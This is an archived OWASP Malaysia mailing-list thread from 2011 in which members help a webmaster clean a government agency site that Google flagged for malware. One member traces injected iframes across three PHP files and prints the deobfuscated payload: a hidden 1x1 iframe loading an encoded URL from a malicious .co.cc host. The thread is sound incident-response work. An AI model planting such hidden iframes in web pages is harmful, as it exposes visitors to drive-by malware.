[Owasp-Malaysia] Malware Detected!

najmi.zabidi at gmail.com najmi.zabidi at gmail.com
Tue Feb 8 21:42:48 EST 2011


Posted here last year ;)

https://lists.owasp.org/pipermail/owasp-malaysia/2010-September/000539.html



On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor
<adnan.shukor at gmail.com> wrote:
> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <rastaboyz at gmail.com> wrote:
>> Syamsuri, nice to hear that.  Can you share your blog address.
>>
>> Adnan good work. Hope to learn more from you.
>>
>> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>>
>>> Mr Adnan thanks for the info and guide..
>>>
>>> I have clean all the mess and the site is up and running again..
>>>
>>> thanks to all too..
>>>
>>> ** I will blog this so others can make it as a guide...
>>>
>>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
>>> <adnan.shukor at gmail.com> wrote:
>>>>
>>>> mamp <= LOL typo.. it should be nano
>>>> js <= one of hte binary in Spidermonkey. get the patched version
>>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>>> working on MacOS/Darwin, apply this patch
>>>>
>>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>>
>>>> thanks
>>>>
>>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>>> <sharuzzaman at gmail.com> wrote:
>>>> > I can see 2 interesting apps/scripts:
>>>> >
>>>> > 1. mamp
>>>> > 2. /opt/analysis/js/js
>>>> >
>>>> > care to share? hopefully it is open source ;)
>>>> >
>>>> >
>>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>>> > <adnan.shukor at gmail.com> wrote:
>>>> >>
>>>> >> Here is my bash history:
>>>> >>
>>>> >> xanda:tmp adnan$ history
>>>> >> <snip>
>>>> >>  500  cd /tmp
>>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>>> >>  503  nano indexsedc.php
>>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>>> >>  505  mamp indexsedc.php.1
>>>> >>  506  nano indexsedc.php.1
>>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>>> >>  508  nano sedc.php
>>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>>> >>  510  nano default.php
>>>> >>  511  nano default.php
>>>> >>  512  clear
>>>> >> <I've remove tags and leave clean JavaScript inside>
>>>> >>  513  mv default.php default.txt
>>>> >>  514  /opt/analysis/js/js < default.txt
>>>> >>  515  cat write.log
>>>> >>  516  history
>>>> >> xanda:tmp adnan$
>>>> >>
>>>> >> Below is the output of the cat:
>>>> >> [output]
>>>> >> xanda:tmp adnan$ cat write.log
>>>> >> <iframe width="1" height="1"
>>>> >>
>>>> >>
>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>>>> >> width="1" height="1"
>>>> >>
>>>> >>
>>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>>> >> [/output]
>>>> >>
>>>> >>
>>>> >> Hint: you might use modified version of spidermonkey to 'understand'
>>>> >> the javascript
>>>> >>
>>>> >> Thanks
>>>> >>
>>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>>> >> > thanks for the info..
>>>> >> > i will check all the file.
>>>> >> >
>>>> >> > how you found it?
>>>> >> >
>>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>>> >> > <adnan.shukor at gmail.com> wrote:
>>>> >> >>
>>>> >> >> Here is the flow:
>>>> >> >>
>>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>>> >> >> 2) and your sedc.php has an iframe to default.php
>>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>>> >> >> actually create an iframe to
>>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >>
>>>> >> >> thanks :)
>>>> >> >>
>>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>>>> >> >> wrote:
>>>> >> >> > can you point...
>>>> >> >> > my index.htm or indexsedc.php or other file?
>>>> >> >> >
>>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>>> >> >> >>
>>>> >> >> >> you have iframe pointed to
>>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >> >>
>>>> >> >> >> which is not xss :)
>>>> >> >> >>
>>>> >> >> >> >From my personal point of view, its either caused by:
>>>> >> >> >> 1) malware on pc which has been used for ftp/access to the
>>>> >> >> >> server
>>>> >> >> >> 2) compromised server
>>>> >> >> >>
>>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>>> >> >> >>
>>>> >> >> >> thanks
>>>> >> >> >>
>>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
>>>> >> >> >> wrote:
>>>> >> >> >> > I have check it.
>>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy
>>>> >> >> >> > <rastaboyz at gmail.com>
>>>> >> >> >> > wrote:
>>>> >> >> >> >>
>>>> >> >> >> >> Hi Mohd Symsuri,
>>>> >> >> >> >>
>>>> >> >> >> >> Why dont you check on the reason why its being blocked, it
>>>> >> >> >> >> might
>>>> >> >> >> >> help.
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>>> >> >> >> >>
>>>> >> >> >> >> Regards,
>>>> >> >> >> >> Kishur
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>>>> >> >> >> >> <msyamsuri at gmail.com>
>>>> >> >> >> >> wrote:
>>>> >> >> >> >>>
>>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>>>> >> >> >> >>> I need some advise.
>>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>>>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for
>>>> >> >> >> >>> almost
>>>> >> >> >> >>> 4
>>>> >> >> >> >>> days.
>>>> >> >> >> >>> It said that we host malware on our server Malware Detected!
>>>> >> >> >> >>> (
>>>> >> >> >> >>> Google
>>>> >> >> >> >>> said that!!)
>>>> >> >> >> >>> What i did is..
>>>> >> >> >> >>> 1. Scan all the data and upload a new data
>>>> >> >> >> >>> 2. Check the index.html or index.php
>>>> >> >> >> >>> 3. Scan using web scanner using
>>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>>> >> >> >> >>> http://www.virustotal.com
>>>> >> >> >> >>> but still get block..
>>>> >> >> >> >>> Googel said Suspected injected code
>>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>>>> >> >> >> >>> NAME="confcontent"
>>>> >> >> >> >>> scrolling=yes >
>>>> >> >> >> >>> I have using this code for almost 2 years
>>>> >> >> >> >>> What should i do now?
>>>> >> >> >> >>>
>>>> >> >> >> >>> --
>>>> >> >> >> >>> best regard
>>>> >> >> >> >>> syamsuri
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>> _______________________________________________
>>>> >> >> >> >>> Owasp-Malaysia mailing list
>>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki
>>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> _______________________________________________
>>>> >> >> >> >> Owasp-Malaysia mailing list
>>>> >> >> >> >> Owasp-Malaysia at lists.owasp.org
>>>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >> >>
>>>> >> >> >> >> OWASP Malaysia Wiki
>>>> >> >> >> >> http://www.owasp.org/index.php/Malaysia
>>>> >> >> >> >>
>>>> >> >> >> >> OWASP Malaysia Wiki Facebook
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> > --
>>>> >> >> >> > best regard
>>>> >> >> >> > syamsuri
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> > _______________________________________________
>>>> >> >> >> > Owasp-Malaysia mailing list
>>>> >> >> >> > Owasp-Malaysia at lists.owasp.org
>>>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >> >
>>>> >> >> >> > OWASP Malaysia Wiki
>>>> >> >> >> > http://www.owasp.org/index.php/Malaysia
>>>> >> >> >> >
>>>> >> >> >> > OWASP Malaysia Wiki Facebook
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >> >
>>>> >> >> >> _______________________________________________
>>>> >> >> >> Owasp-Malaysia mailing list
>>>> >> >> >> Owasp-Malaysia at lists.owasp.org
>>>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >>
>>>> >> >> >> OWASP Malaysia Wiki
>>>> >> >> >> http://www.owasp.org/index.php/Malaysia
>>>> >> >> >>
>>>> >> >> >> OWASP Malaysia Wiki Facebook
>>>> >> >> >>
>>>> >> >> >>
>>>> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >
>>>> >> >> >
>>>> >> >> >
>>>> >> >> > --
>>>> >> >> > best regard
>>>> >> >> > syamsuri
>>>> >> >> >
>>>> >> >> >
>>>> >> >> >
>>>> >> >> > _______________________________________________
>>>> >> >> > Owasp-Malaysia mailing list
>>>> >> >> > Owasp-Malaysia at lists.owasp.org
>>>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >
>>>> >> >> > OWASP Malaysia Wiki
>>>> >> >> > http://www.owasp.org/index.php/Malaysia
>>>> >> >> >
>>>> >> >> > OWASP Malaysia Wiki Facebook
>>>> >> >> >
>>>> >> >> >
>>>> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >
>>>> >> >> _______________________________________________
>>>> >> >> Owasp-Malaysia mailing list
>>>> >> >> Owasp-Malaysia at lists.owasp.org
>>>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >>
>>>> >> >> OWASP Malaysia Wiki
>>>> >> >> http://www.owasp.org/index.php/Malaysia
>>>> >> >>
>>>> >> >> OWASP Malaysia Wiki Facebook
>>>> >> >>
>>>> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >
>>>> >> >
>>>> >> >
>>>> >> > --
>>>> >> > best regard
>>>> >> > syamsuri
>>>> >> >
>>>> >> >
>>>> >> >
>>>> >> > _______________________________________________
>>>> >> > Owasp-Malaysia mailing list
>>>> >> > Owasp-Malaysia at lists.owasp.org
>>>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >
>>>> >> > OWASP Malaysia Wiki
>>>> >> > http://www.owasp.org/index.php/Malaysia
>>>> >> >
>>>> >> > OWASP Malaysia Wiki Facebook
>>>> >> >
>>>> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >
>>>> >> _______________________________________________
>>>> >> Owasp-Malaysia mailing list
>>>> >> Owasp-Malaysia at lists.owasp.org
>>>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >>
>>>> >> OWASP Malaysia Wiki
>>>> >> http://www.owasp.org/index.php/Malaysia
>>>> >>
>>>> >> OWASP Malaysia Wiki Facebook
>>>> >>
>>>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Sharuzzaman Ahmat Raslan
>>>> >
>>>> > _______________________________________________
>>>> > Owasp-Malaysia mailing list
>>>> > Owasp-Malaysia at lists.owasp.org
>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >
>>>> > OWASP Malaysia Wiki
>>>> > http://www.owasp.org/index.php/Malaysia
>>>> >
>>>> > OWASP Malaysia Wiki Facebook
>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >
>>>> _______________________________________________
>>>> Owasp-Malaysia mailing list
>>>> Owasp-Malaysia at lists.owasp.org
>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>
>>>> OWASP Malaysia Wiki
>>>> http://www.owasp.org/index.php/Malaysia
>>>>
>>>> OWASP Malaysia Wiki Facebook
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>>>
>>>
>>> --
>>> best regard
>>> syamsuri
>>>
>>>
>>>
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>


More information about the Owasp-Malaysia mailing list